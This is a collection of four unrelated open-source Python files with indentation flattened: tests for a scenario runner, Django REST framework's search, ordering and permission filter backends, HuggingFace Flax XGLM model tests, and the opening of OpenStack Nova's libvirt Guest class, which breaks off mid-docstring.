first_step = VirtualStep(scenario_.first_step)
second_step = VirtualStep(scenario_.second_step)
third_step = VirtualStep(scenario_.third_step)
scenario = VirtualScenario(scenario_, [first_step, second_step, third_step])
with when:
scenario_result = await runner.run_scenario(scenario)
with then:
assert scenario_result.is_failed() is True
assert isinstance(scenario_result.started_at, float)
assert isinstance(scenario_result.ended_at, float)
first_step_result = scenario_result.step_results[0]
second_step_result = scenario_result.step_results[1]
assert dispatcher.mock_calls == [
call.fire(ScenarioRunEvent(scenario_result)),
call.fire(StepRunEvent(first_step_result)),
call.fire(StepPassedEvent(first_step_result)),
call.fire(StepRunEvent(second_step_result)),
call.fire(ExceptionRaisedEvent(second_step_result.exc_info)),
call.fire(StepFailedEvent(second_step_result)),
call.fire(ScenarioFailedEvent(scenario_result)),
]
@pytest.mark.asyncio
async def test_runner_interrupted_scenario(*, dispatcher_: Dispatcher):
with given:
interrupt_exception = KeyboardInterrupt
runner = Runner(dispatcher_, interrupt_exceptions=(interrupt_exception,))
step_ = Mock(side_effect=interrupt_exception)
scenario_ = Mock(Scenario, step=step_, __file__="/tmp/scenario.py")
virtual_scenario = VirtualScenario(scenario_, [VirtualStep(step_)])
with when, raises(BaseException) as exception:
await runner.run_scenario(virtual_scenario)
with then:
assert exception.type is interrupt_exception
|
|
"""
Provides generic filtering backends that can be used to filter the results
returned by list views.
"""
from __future__ import unicode_literals
import operator
from functools import reduce
from django.core.exceptions import ImproperlyConfigured
from django.db import models
from django.db.models.constants import LOOKUP_SEP
from django.db.models.sql.constants import ORDER_PATTERN
from django.template import loader
from django.utils import six
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
from rest_framework.compat import (
coreapi, coreschema, distinct, guardian, template_render
)
from rest_framework.settings import api_settings
class BaseFilterBackend(object):
"""
A base class from which all filter backend classes should inherit.
"""
def filter_queryset(self, request, queryset, view):
"""
Return a filtered queryset.
"""
raise NotImplementedError(".filter_queryset() must be overridden.")
def get_schema_fields(self, view):
assert coreapi is not None, 'coreapi must be installed to use `get_schema_fields()`'
assert coreschema is not None, 'coreschema must be installed to use `get_schema_fields()`'
return []
class SearchFilter(BaseFilterBackend):
# The URL query parameter used for the search.
search_param = api_settings.SEARCH_PARAM
template = 'rest_framework/filters/search.html'
lookup_prefixes = {
'^': 'istartswith',
'=': 'iexact',
'@': 'search',
'$': 'iregex',
}
search_title = _('Search')
search_description = _('A search term.')
def get_search_terms(self, request):
"""
Search terms are set by a ?search=... query parameter,
and may be comma and/or whitespace delimited.
"""
params = request.query_params.get(self.search_param, '')
return params.replace(',', ' ').split()
def construct_search(self, field_name):
lookup = self.lookup_prefixes.get(field_name[0])
if lookup:
field_name = field_name[1:]
else:
lookup = 'icontains'
return LOOKUP_SEP.join([field_name, lookup])
def must_call_distinct(self, queryset, search_fields):
"""
Return True if 'distinct()' should be used to query the given lookups.
"""
for search_field in search_fields:
opts = queryset.model._meta
if search_field[0] in self.lookup_prefixes:
search_field = search_field[1:]
parts = search_field.split(LOOKUP_SEP)
for part in parts:
field = opts.get_field(part)
if hasattr(field, 'get_path_info'):
# This field is a relation, update opts to follow the relation
path_info = field.get_path_info()
opts = path_info[-1].to_opts
if any(path.m2m for path in path_info):
# This field is a m2m relation so we know we need to call distinct
return True
return False
def filter_queryset(self, request, queryset, view):
search_fields = getattr(view, 'search_fields', None)
search_terms = self.get_search_terms(request)
if not search_fields or not search_terms:
return queryset
orm_lookups = [
self.construct_search(six.text_type(search_field))
for search_field in search_fields
]
base = queryset
conditions = []
for search_term in search_terms:
queries = [
models.Q(**{orm_lookup: search_term})
for orm_lookup in orm_lookups
]
conditions.append(reduce(operator.or_, queries))
queryset = queryset.filter(reduce(operator.and_, conditions))
if self.must_call_distinct(queryset, search_fields):
# Filtering against a many-to-many field requires us to
# call queryset.distinct() in order to avoid duplicate items
# in the resulting queryset.
# We try to avoid this if possible, for performance reasons.
queryset = distinct(queryset, base)
return queryset
def to_html(self, request, queryset, view):
if not getattr(view, 'search_fields', None):
return ''
term = self.get_search_terms(request)
term = term[0] if term else ''
context = {
'param': self.search_param,
'term': term
}
template = loader.get_template(self.template)
return template_render(template, context)
def get_schema_fields(self, view):
assert coreapi is not None, 'coreapi must be installed to use `get_schema_fields()`'
assert coreschema is not None, 'coreschema must be installed to use `get_schema_fields()`'
return [
coreapi.Field(
name=self.search_param,
required=False,
location='query',
schema=coreschema.String(
title=force_text(self.search_title),
description=force_text(self.search_description)
)
)
]
class OrderingFilter(BaseFilterBackend):
# The URL query parameter used for the ordering.
ordering_param = api_settings.ORDERING_PARAM
ordering_fields = None
ordering_title = _('Ordering')
ordering_description = _('Which field to use when ordering the results.')
template = 'rest_framework/filters/ordering.html'
def get_ordering(self, request, queryset, view):
"""
Ordering is set by a comma delimited ?ordering=... query parameter.
The `ordering` query parameter can be overridden by setting
the `ordering_param` value on the OrderingFilter or by
specifying an `ORDERING_PARAM` value in the API settings.
"""
params = request.query_params.get(self.ordering_param)
if params:
fields = [param.strip() for param in params.split(',')]
ordering = self.remove_invalid_fields(queryset, fields, view, request)
if ordering:
return ordering
# No ordering was included, or all the ordering fields were invalid
return self.get_default_ordering(view)
def get_default_ordering(self, view):
ordering = getattr(view, 'ordering', None)
if isinstance(ordering, six.string_types):
return (ordering,)
return ordering
def get_default_valid_fields(self, queryset, view, context={}):
# If `ordering_fields` is not specified, then we determine a default
# based on the serializer class, if one exists on the view.
if hasattr(view, 'get_serializer_class'):
try:
serializer_class = view.get_serializer_class()
except AssertionError:
# Raised by the default implementation if
# no serializer_class was found
serializer_class = None
else:
serializer_class = getattr(view, 'serializer_class', None)
if serializer_class is None:
msg = (
"Cannot use %s on a view which does not have either a "
"'serializer_class', an overriding 'get_serializer_class' "
"or 'ordering_fields' attribute."
)
raise ImproperlyConfigured(msg % self.__class__.__name__)
return [
(field.source or field_name, field.label)
for field_name, field in serializer_class(context=context).fields.items()
if not getattr(field, 'write_only', False) and not field.source == '*'
]
def get_valid_fields(self, queryset, view, context={}):
valid_fields = getattr(view, 'ordering_fields', self.ordering_fields)
if valid_fields is None:
# Default to allowing filtering on serializer fields
return self.get_default_valid_fields(queryset, view, context)
elif valid_fields == '__all__':
# View explicitly allows filtering on any model field
valid_fields = [
(field.name, field.verbose_name) for field in queryset.model._meta.fields
]
valid_fields += [
(key, key.title().split('__'))
for key in queryset.query.annotations.keys()
]
else:
valid_fields = [
(item, item) if isinstance(item, six.string_types) else item
for item in valid_fields
]
return valid_fields
def remove_invalid_fields(self, queryset, fields, view, request):
valid_fields = [item[0] for item in self.get_valid_fields(queryset, view, {'request': request})]
return [term for term in fields if term.lstrip('-') in valid_fields and ORDER_PATTERN.match(term)]
def filter_queryset(self, request, queryset, view):
ordering = self.get_ordering(request, queryset, view)
if ordering:
return queryset.order_by(*ordering)
return queryset
def get_template_context(self, request, queryset, view):
current = self.get_ordering(request, queryset, view)
current = None if current is None else current[0]
options = []
context = {
'request': request,
'current': current,
'param': self.ordering_param,
}
for key, label in self.get_valid_fields(queryset, view, context):
options.append((key, '%s - %s' % (label, _('ascending'))))
options.append(('-' + key, '%s - %s' % (label, _('descending'))))
context['options'] = options
return context
def to_html(self, request, queryset, view):
template = loader.get_template(self.template)
context = self.get_template_context(request, queryset, view)
return template_render(template, context)
def get_schema_fields(self, view):
assert coreapi is not None, 'coreapi must be installed to use `get_schema_fields()`'
assert coreschema is not None, 'coreschema must be installed to use `get_schema_fields()`'
return [
coreapi.Field(
name=self.ordering_param,
required=False,
location='query',
schema=coreschema.String(
title=force_text(self.ordering_title),
description=force_text(self.ordering_description)
)
)
]
class DjangoObjectPermissionsFilter(BaseFilterBackend):
"""
A filter backend that limits results to those where the requesting user
has read object level permissions.
"""
def __init__(self):
assert guardian, 'Using DjangoObjectPermissionsFilter, but django-guardian is not installed'
perm_format = '%(app_label)s.view_%(model_name)s'
def filter_queryset(self, request, queryset, view):
# We want to defer this import until run-time, rather than import-time.
# See https://github.com/encode/django-rest-framework/issues/4608
# (Also see #1624 for why we need to make this import explicitly)
from guardian.shortcuts import get_objects_for_user
extra = {}
user = request.user
model_cls = queryset.model
kwargs = {
'app_label': model_cls._meta.app_label,
'model_name': model_cls._meta.model_name
}
permission = self.perm_format % kwargs
if tuple(guardian.VERSION) >= (1, 3):
# Maintain behavior compatibility with versions prior to 1.3
extra = {'accept_global_perms': False}
else:
extra = {}
return get_objects_for_user(user, permission, queryset, **extra)
|
|
# coding=utf-8
# Copyright 2021 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tempfile
import unittest
import transformers
from transformers import XGLMConfig, XGLMTokenizer, is_flax_available, is_torch_available
from transformers.testing_utils import is_pt_flax_cross_test, require_flax, require_sentencepiece, slow
from ..generation.test_generation_flax_utils import FlaxGenerationTesterMixin
from ..test_modeling_flax_common import FlaxModelTesterMixin, floats_tensor, ids_tensor, random_attention_mask
if is_flax_available():
import numpy as np
import jax
import jax.numpy as jnp
from transformers.modeling_flax_pytorch_utils import (
convert_pytorch_state_dict_to_flax,
load_flax_weights_in_pytorch_model,
)
from transformers.models.xglm.modeling_flax_xglm import FlaxXGLMForCausalLM, FlaxXGLMModel
if is_torch_available():
import torch
@require_flax
class FlaxXGLMModelTester:
def __init__(
self,
parent,
batch_size=14,
seq_length=7,
is_training=True,
use_input_mask=True,
use_labels=True,
vocab_size=99,
d_model=32,
num_hidden_layers=5,
num_attention_heads=4,
ffn_dim=37,
activation_function="gelu",
activation_dropout=0.1,
attention_dropout=0.1,
max_position_embeddings=512,
initializer_range=0.02,
scope=None,
):
self.parent = parent
self.batch_size = batch_size
self.seq_length = seq_length
self.is_training = is_training
self.use_input_mask = use_input_mask
self.use_labels = use_labels
self.vocab_size = vocab_size
self.hidden_size = d_model
self.num_hidden_layers = num_hidden_layers
self.num_attention_heads = num_attention_heads
self.ffn_dim = ffn_dim
self.activation_function = activation_function
self.activation_dropout = activation_dropout
self.attention_dropout = attention_dropout
self.max_position_embeddings = max_position_embeddings
self.initializer_range = initializer_range
self.scope = None
self.bos_token_id = 0
self.eos_token_id = 2
self.pad_token_id = 1
def prepare_config_and_inputs(self):
input_ids = np.clip(ids_tensor([self.batch_size, self.seq_length], self.vocab_size), 3, self.vocab_size)
input_mask = None
if self.use_input_mask:
input_mask = random_attention_mask([self.batch_size, self.seq_length])
config = XGLMConfig(
vocab_size=self.vocab_size,
d_model=self.hidden_size,
num_layers=self.num_hidden_layers,
attention_heads=self.num_attention_heads,
ffn_dim=self.ffn_dim,
activation_function=self.activation_function,
activation_dropout=self.activation_dropout,
attention_dropout=self.attention_dropout,
max_position_embeddings=self.max_position_embeddings,
initializer_range=self.initializer_range,
use_cache=True,
bos_token_id=self.bos_token_id,
eos_token_id=self.eos_token_id,
pad_token_id=self.pad_token_id,
)
return (config, input_ids, input_mask)
def prepare_config_and_inputs_for_common(self):
config_and_inputs = self.prepare_config_and_inputs()
config, input_ids, attention_mask = config_and_inputs
inputs_dict = {"input_ids": input_ids, "attention_mask": attention_mask}
return config, inputs_dict
def prepare_config_and_inputs_for_decoder(self):
config, input_ids, attention_mask = self.prepare_config_and_inputs()
encoder_hidden_states = floats_tensor([self.batch_size, self.seq_length, self.hidden_size])
encoder_attention_mask = ids_tensor([self.batch_size, self.seq_length], vocab_size=2)
return (
config,
input_ids,
attention_mask,
encoder_hidden_states,
encoder_attention_mask,
)
def check_use_cache_forward(self, model_class_name, config, input_ids, attention_mask):
max_decoder_length = 20
model = model_class_name(config)
past_key_values = model.init_cache(input_ids.shape[0], max_decoder_length)
attention_mask = jnp.ones((input_ids.shape[0], max_decoder_length), dtype="i4")
position_ids = jnp.broadcast_to(
jnp.arange(input_ids.shape[-1] - 1)[None, :], (input_ids.shape[0], input_ids.shape[-1] - 1)
)
outputs_cache = model(
input_ids[:, :-1],
attention_mask=attention_mask,
past_key_values=past_key_values,
position_ids=position_ids,
)
position_ids = jnp.array(input_ids.shape[0] * [[input_ids.shape[-1] - 1]], dtype="i4")
outputs_cache_next = model(
input_ids[:, -1:],
attention_mask=attention_mask,
past_key_values=outputs_cache.past_key_values,
position_ids=position_ids,
)
outputs = model(input_ids)
diff = np.max(np.abs((outputs_cache_next[0][:, -1, :5] - outputs[0][:, -1, :5])))
self.parent.assertTrue(diff < 1e-3, msg=f"Max diff is {diff}")
def check_use_cache_forward_with_attn_mask(self, model_class_name, config, input_ids, attention_mask):
max_decoder_length = 20
model = model_class_name(config)
attention_mask_cache = jnp.concatenate(
[attention_mask, jnp.zeros((attention_mask.shape[0], max_decoder_length - attention_mask.shape[1]))],
axis=-1,
)
past_key_values = model.init_cache(input_ids.shape[0], max_decoder_length)
position_ids = jnp.broadcast_to(
jnp.arange(input_ids.shape[-1] - 1)[None, :], (input_ids.shape[0], input_ids.shape[-1] - 1)
)
outputs_cache = model(
input_ids[:, :-1],
attention_mask=attention_mask_cache,
past_key_values=past_key_values,
position_ids=position_ids,
)
position_ids = jnp.array(input_ids.shape[0] * [[input_ids.shape[-1] - 1]], dtype="i4")
outputs_cache_next = model(
input_ids[:, -1:],
past_key_values=outputs_cache.past_key_values,
attention_mask=attention_mask_cache,
position_ids=position_ids,
)
outputs = model(input_ids, attention_mask=attention_mask)
diff = np.max(np.abs((outputs_cache_next[0][:, -1, :5] - outputs[0][:, -1, :5])))
self.parent.assertTrue(diff < 1e-3, msg=f"Max diff is {diff}")
@require_sentencepiece
@require_flax
class FlaxXGLMModelTest(FlaxModelTesterMixin, FlaxGenerationTesterMixin, unittest.TestCase):
all_model_classes = (FlaxXGLMModel, FlaxXGLMForCausalLM) if is_flax_available() else ()
all_generative_model_classes = (FlaxXGLMForCausalLM,) if is_flax_available() else ()
def setUp(self):
self.model_tester = FlaxXGLMModelTester(self)
def test_use_cache_forward(self):
for model_class_name in self.all_model_classes:
config, input_ids, attention_mask = self.model_tester.prepare_config_and_inputs()
self.model_tester.check_use_cache_forward(model_class_name, config, input_ids, attention_mask)
def test_use_cache_forward_with_attn_mask(self):
for model_class_name in self.all_model_classes:
config, input_ids, attention_mask = self.model_tester.prepare_config_and_inputs()
self.model_tester.check_use_cache_forward_with_attn_mask(
model_class_name, config, input_ids, attention_mask
)
@slow
def test_batch_generation(self):
tokenizer = XGLMTokenizer.from_pretrained("XGLM", padding_side="left")
inputs = tokenizer(["Hello this is a long string", "Hey"], return_tensors="np", padding=True, truncation=True)
model = FlaxXGLMForCausalLM.from_pretrained("facebook/xglm-564M")
model.config.num_beams = 1
model.config.do_sample = False
jit_generate = jax.jit(model.generate)
output_sequences = jit_generate(inputs["input_ids"], attention_mask=inputs["attention_mask"]).sequences
output_string = tokenizer.batch_decode(output_sequences, skip_special_tokens=True)
expected_string = [
"Hello this is a long string of questions, but I'm not sure if I'm",
"Hey, I'm a newbie to the forum and I'",
]
self.assertListEqual(output_string, expected_string)
# overwrite from common since `attention_mask` in combination
# with `causal_mask` behaves slighly differently
@is_pt_flax_cross_test
def test_equivalence_pt_to_flax(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in self.all_model_classes:
with self.subTest(model_class.__name__):
# prepare inputs
prepared_inputs_dict = self._prepare_for_class(inputs_dict, model_class)
pt_inputs = {k: torch.tensor(v.tolist()) for k, v in prepared_inputs_dict.items()}
# load corresponding PyTorch class
pt_model_class_name = model_class.__name__[4:] # Skip the "Flax" at the beginning
pt_model_class = getattr(transformers, pt_model_class_name)
batch_size, seq_length = pt_inputs["input_ids"].shape
rnd_start_indices = np.random.randint(0, seq_length - 1, size=(batch_size,))
for batch_idx, start_index in enumerate(rnd_start_indices):
pt_inputs["attention_mask"][batch_idx, :start_index] = 0
pt_inputs["attention_mask"][batch_idx, start_index:] = 1
prepared_inputs_dict["attention_mask"][batch_idx, :start_index] = 0
prepared_inputs_dict["attention_mask"][batch_idx, start_index:] = 1
pt_model = pt_model_class(config).eval()
# Flax models don't use the `use_cache` option and cache is not returned as a default.
# So we disable `use_cache` here for PyTorch model.
pt_model.config.use_cache = False
fx_model = model_class(config, dtype=jnp.float32)
fx_state = convert_pytorch_state_dict_to_flax(pt_model.state_dict(), fx_model)
fx_model.params = fx_state
with torch.no_grad():
pt_outputs = pt_model(**pt_inputs).to_tuple()
fx_outputs = fx_model(**prepared_inputs_dict).to_tuple()
self.assertEqual(len(fx_outputs), len(pt_outputs), "Output lengths differ between Flax and PyTorch")
for fx_output, pt_output in zip(fx_outputs, pt_outputs):
self.assert_almost_equals(fx_output[:, -1], pt_output[:, -1].numpy(), 4e-2)
with tempfile.TemporaryDirectory() as tmpdirname:
pt_model.save_pretrained(tmpdirname)
fx_model_loaded = model_class.from_pretrained(tmpdirname, from_pt=True)
fx_outputs_loaded = fx_model_loaded(**prepared_inputs_dict).to_tuple()
self.assertEqual(
len(fx_outputs_loaded), len(pt_outputs), "Output lengths differ between Flax and PyTorch"
)
for fx_output_loaded, pt_output in zip(fx_outputs_loaded, pt_outputs):
self.assert_almost_equals(fx_output_loaded[:, -1], pt_output[:, -1].numpy(), 4e-2)
# overwrite from common since `attention_mask` in combination
# with `causal_mask` behaves slighly differently
@is_pt_flax_cross_test
def test_equivalence_flax_to_pt(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in self.all_model_classes:
with self.subTest(model_class.__name__):
# prepare inputs
prepared_inputs_dict = self._prepare_for_class(inputs_dict, model_class)
pt_inputs = {k: torch.tensor(v.tolist()) for k, v in prepared_inputs_dict.items()}
# load corresponding PyTorch class
pt_model_class_name = model_class.__name__[4:] # Skip the "Flax" at the beginning
pt_model_class = getattr(transformers, pt_model_class_name)
pt_model = pt_model_class(config).eval()
pt_model.config.use_cache = False
fx_model = model_class(config, dtype=jnp.float32)
pt_model = load_flax_weights_in_pytorch_model(pt_model, fx_model.params)
batch_size, seq_length = pt_inputs["input_ids"].shape
rnd_start_indices = np.random.randint(0, seq_length - 1, size=(batch_size,))
for batch_idx, start_index in enumerate(rnd_start_indices):
pt_inputs["attention_mask"][batch_idx, :start_index] = 0
pt_inputs["attention_mask"][batch_idx, start_index:] = 1
prepared_inputs_dict["attention_mask"][batch_idx, :start_index] = 0
prepared_inputs_dict["attention_mask"][batch_idx, start_index:] = 1
# make sure weights are tied in PyTorch
pt_model.tie_weights()
with torch.no_grad():
pt_outputs = pt_model(**pt_inputs).to_tuple()
fx_outputs = fx_model(**prepared_inputs_dict).to_tuple()
self.assertEqual(len(fx_outputs), len(pt_outputs), "Output lengths differ between Flax and PyTorch")
for fx_output, pt_output in zip(fx_outputs, pt_outputs):
self.assert_almost_equals(fx_output[:, -1], pt_output[:, -1].numpy(), 4e-2)
with tempfile.TemporaryDirectory() as tmpdirname:
fx_model.save_pretrained(tmpdirname)
pt_model_loaded = pt_model_class.from_pretrained(tmpdirname, from_flax=True)
with torch.no_grad():
pt_outputs_loaded = pt_model_loaded(**pt_inputs).to_tuple()
self.assertEqual(
len(fx_outputs), len(pt_outputs_loaded), "Output lengths differ between Flax and PyTorch"
)
for fx_output, pt_output in zip(fx_outputs, pt_outputs_loaded):
self.assert_almost_equals(fx_output[:, -1], pt_output[:, -1].numpy(), 4e-2)
@slow
def test_model_from_pretrained(self):
for model_class_name in self.all_model_classes:
model = model_class_name.from_pretrained("facebook/xglm-564M")
outputs = model(np.ones((1, 1)))
self.assertIsNotNone(outputs)
|
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2015 Red Hat, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Manages information about the guest.
This class encapsulates libvirt domain provides certain
higher level APIs around the raw libvirt API. These APIs are
then used by all the other libvirt related classes
"""
import time
import typing as ty
from lxml import etree
from oslo_log import log as logging
from oslo_utils import encodeutils
from oslo_utils import excutils
from oslo_utils import importutils
from nova.compute import power_state
from nova import exception
from nova.i18n import _
from nova.virt import hardware
from nova.virt.libvirt import config as vconfig
if ty.TYPE_CHECKING:
import libvirt
else:
libvirt = None
try:
import libvirtmod_qemu
except ImportError:
libvirtmod_qemu = None
LOG = logging.getLogger(__name__)
VIR_DOMAIN_NOSTATE = 0
VIR_DOMAIN_RUNNING = 1
VIR_DOMAIN_BLOCKED = 2
VIR_DOMAIN_PAUSED = 3
VIR_DOMAIN_SHUTDOWN = 4
VIR_DOMAIN_SHUTOFF = 5
VIR_DOMAIN_CRASHED = 6
VIR_DOMAIN_PMSUSPENDED = 7
LIBVIRT_POWER_STATE = {
VIR_DOMAIN_NOSTATE: power_state.NOSTATE,
VIR_DOMAIN_RUNNING: power_state.RUNNING,
# The DOMAIN_BLOCKED state is only valid in Xen. It means that
# the VM is running and the vCPU is idle. So, we map it to RUNNING
VIR_DOMAIN_BLOCKED: power_state.RUNNING,
VIR_DOMAIN_PAUSED: power_state.PAUSED,
# The libvirt API doc says that DOMAIN_SHUTDOWN means the domain
# is being shut down. So technically the domain is still
# running. SHUTOFF is the real powered off state. But we will map
# both to SHUTDOWN anyway.
# http://libvirt.org/html/libvirt-libvirt.html
VIR_DOMAIN_SHUTDOWN: power_state.SHUTDOWN,
VIR_DOMAIN_SHUTOFF: power_state.SHUTDOWN,
VIR_DOMAIN_CRASHED: power_state.CRASHED,
VIR_DOMAIN_PMSUSPENDED: power_state.SUSPENDED,
}
# https://libvirt.org/html/libvirt-libvirt-domain.html#virDomainBlockJobType
VIR_DOMAIN_BLOCK_JOB_TYPE_UNKNOWN = 0
VIR_DOMAIN_BLOCK_JOB_TYPE_PULL = 1
VIR_DOMAIN_BLOCK_JOB_TYPE_COPY = 2
VIR_DOMAIN_BLOCK_JOB_TYPE_COMMIT = 3
VIR_DOMAIN_BLOCK_JOB_TYPE_ACTIVE_COMMIT = 4
VIR_DOMAIN_BLOCK_JOB_TYPE_BACKUP = 5
VIR_DOMAIN_BLOCK_JOB_TYPE_LAST = 6
LIBVIRT_BLOCK_JOB_TYPE = {
VIR_DOMAIN_BLOCK_JOB_TYPE_UNKNOWN: 'UNKNOWN',
VIR_DOMAIN_BLOCK_JOB_TYPE_PULL: 'PULL',
VIR_DOMAIN_BLOCK_JOB_TYPE_COPY: 'COPY',
VIR_DOMAIN_BLOCK_JOB_TYPE_COMMIT: 'COMMIT',
VIR_DOMAIN_BLOCK_JOB_TYPE_ACTIVE_COMMIT: 'ACTIVE_COMMIT',
VIR_DOMAIN_BLOCK_JOB_TYPE_BACKUP: 'BACKUP',
VIR_DOMAIN_BLOCK_JOB_TYPE_LAST: 'LAST',
}
class Guest(object):
def __init__(self, domain):
global libvirt
if libvirt is None:
libvirt = importutils.import_module('libvirt')
self._domain = domain
def __repr__(self):
return "<Guest %(id)d %(name)s %(uuid)s>" % {
'id': self.id,
'name': self.name,
'uuid': self.uuid
}
@property
def id(self):
return self._domain.ID()
@property
def uuid(self):
return self._domain.UUIDString()
@property
def name(self):
return self._domain.name()
@property
def _encoded_xml(self):
return encodeutils.safe_decode(self._domain.XMLDesc(0))
@classmethod
def create(cls, xml, host):
"""Create a new Guest
:param xml: XML definition of the domain to create
:param host: host.Host connection to define the guest on
:returns guest.Guest: Guest ready to be launched
"""
try:
if isinstance(xml, bytes):
xml = xml.decode('utf-8')
guest = host.write_instance_config(xml)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error('Error defining a guest with XML: %s',
encodeutils.safe_decode(xml))
return guest
def launch(self, pause=False):
"""Starts a created guest.
:param pause: Indicates whether to start and pause the guest
"""
flags = pause and libvirt.VIR_DOMAIN_START_PAUSED or 0
try:
return self._domain.createWithFlags(flags)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception('Error launching a defined domain with XML: %s',
self._encoded_xml, errors='ignore')
def poweroff(self):
"""Stops a running guest."""
self._domain.destroy()
def sync_guest_time(self):
"""Try to set VM time to the current value. This is typically useful
when clock wasn't running on the VM for some time (e.g. during
suspension or migration), especially if the time delay exceeds NTP
tolerance.
It is not guaranteed that the time is actually set (it depends on guest
environment, especially QEMU agent presence) or that the set time is
very precise (NTP in the guest should take care of it if needed).
"""
t = time.time()
seconds = int(t)
nseconds = int((t - seconds) * 10 ** 9)
try:
self._domain.setTime(time={'seconds': seconds,
'nseconds': nseconds})
except libvirt.libvirtError as e:
code = e.get_error_code()
if code == libvirt.VIR_ERR_AGENT_UNRESPONSIVE:
LOG.debug('Failed to set time: QEMU agent unresponsive',
instance_uuid=self.uuid)
elif code == libvirt.VIR_ERR_OPERATION_UNSUPPORTED:
LOG.debug('Failed to set time: not supported',
instance_uuid=self.uuid)
elif code == libvirt.VIR_ERR_ARGUMENT_UNSUPPORTED:
LOG.debug('Failed to set time: agent not configured',
instance_uuid=self.uuid)
else:
LOG.warning('Failed to set time: %(reason)s',
{'reason': e}, instance_uuid=self.uuid)
except Exception as ex:
# The highest priority is not to let this method crash and thus
# disrupt its caller in any way. So we swallow this error here,
# to be absolutely safe.
LOG.debug('Failed to set time: %(reason)s',
{'reason': ex}, instance_uuid=self.uuid)
else:
LOG.debug('Time updated to: %d.%09d', seconds, nseconds,
instance_uuid=self.uuid)
def inject_nmi(self):
"""Injects an NMI to a guest."""
self._domain.injectNMI()
def resume(self):
"""Resumes a paused guest."""
self._domain.resume()
def get_interfaces(self):
"""Returns a list of all network interfaces for this domain."""
doc = None
try:
doc = etree.fromstring(self._encoded_xml)
except Exception:
return []
interfaces = []
nodes = doc.findall('./devices/interface/target')
for target in nodes:
interfaces.append(target.get('dev'))
return interfaces
def get_interface_by_cfg(
self,
cfg: vconfig.LibvirtConfigGuestDevice,
from_persistent_config: bool = False
) -> ty.Optional[vconfig.LibvirtConfigGuestDevice]:
"""Lookup a full LibvirtConfigGuestDevice with
LibvirtConfigGuesDevice generated
by nova.virt.libvirt.vif.get_config.
:param cfg: config object that represents the guest interface.
:param from_persistent_config: query the device from the persistent
domain instead of the live domain configuration
:returns: nova.virt.libvirt.config.LibvirtConfigGuestDevice instance
if found, else None
"""
if cfg:
interfaces = self.get_all_devices(
type(cfg), from_persistent_config)
for interface in interfaces:
# NOTE(leehom) LibvirtConfigGuest get from domain and
# LibvirtConfigGuest generated by
# nova.virt.libvirt.vif.get_config must be identical.
# NOTE(gibi): LibvirtConfigGuest subtypes does a custom
# equality check based on available information on nova side
if cfg == interface:
return interface
return None
def get_vcpus_info(self):
"""Returns virtual cpus information of guest.
:returns: guest.VCPUInfo
"""
vcpus = self._domain.vcpus()
for vcpu in vcpus[0]:
yield VCPUInfo(
id=vcpu[0], cpu=vcpu[3], state=vcpu[1], time=vcpu[2])
def delete_configuration(self, support_uefi=False):
"""Undefines a domain from hypervisor."""
try:
flags = libvirt.VIR_DOMAIN_UNDEFINE_MANAGED_SAVE
if support_uefi:
flags |= libvirt.VIR_DOMAIN_UNDEFINE_NVRAM
self._domain.undefineFlags(flags)
except libvirt.libvirtError:
LOG.debug("Error from libvirt during undefineFlags for guest "
"%d. Retrying with undefine", self.id)
self._domain.undefine()
except AttributeError:
# Older versions of libvirt don't support undefine flags,
# trying to remove managed image
try:
if self._domain.hasManagedSaveImage(0):
self._domain.managedSaveRemove(0)
except AttributeError:
pass
self._domain.undefine()
def has_persistent_configuration(self):
"""Whether domain config is persistently stored on the host."""
return self._domain.isPersistent()
def attach_device(self, conf, persistent=False, live=False):
"""Attaches device to the guest.
:param conf: A LibvirtConfigObject of the device to attach
:param persistent: A bool to indicate whether the change is
persistent or not
:param live: A bool to indicate whether it affect the guest
in running state
"""
flags = persistent and libvirt.VIR_DOMAIN_AFFECT_CONFIG or 0
flags |= live and libvirt.VIR_DOMAIN_AFFECT_LIVE or 0
device_xml = conf.to_xml()
if isinstance(device_xml, bytes):
device_xml = device_xml.decode('utf-8')
LOG.debug("attach device xml: %s", device_xml)
self._domain.attachDeviceFlags(device_xml, flags=flags)
def set_metadata(self, metadata, persistent=False, live=False):
"""Set metadata to the guest.
Please note that this function completely replaces the existing
metadata. The scope of the replacement is limited to the Nova-specific
XML Namespace.
:param metadata: A LibvirtConfigGuestMetaNovaInstance
:param persistent: A bool to indicate whether the change is
persistent or not
:param live: A bool to indicate whether it affect the guest
in running state
"""
flags = persistent and libvirt.VIR_DOMAIN_AFFECT_CONFIG or 0
flags |= live and libvirt.VIR_DOMAIN_AFFECT_LIVE or 0
metadata_xml = metadata.to_xml()
LOG.debug("set metadata xml: %s", metadata_xml)
self._domain.setMetadata(libvirt.VIR_DOMAIN_METADATA_ELEMENT,
metadata_xml, "instance",
vconfig.NOVA_NS, flags=flags)
def get_config(self):
"""Returns the config instance for a guest
:returns: LibvirtConfigGuest instance
"""
config = vconfig.LibvirtConfigGuest()
config.parse_str(self._domain.XMLDesc(0))
return config
def get_disk(
self,
device: str,
from_persistent_config: bool = False
) -> ty.Optional[vconfig.LibvirtConfigGuestDisk]:
"""Returns the disk mounted at device
:param device: the name of either the source or the target device
:param from_persistent_config: query the device from the persistent
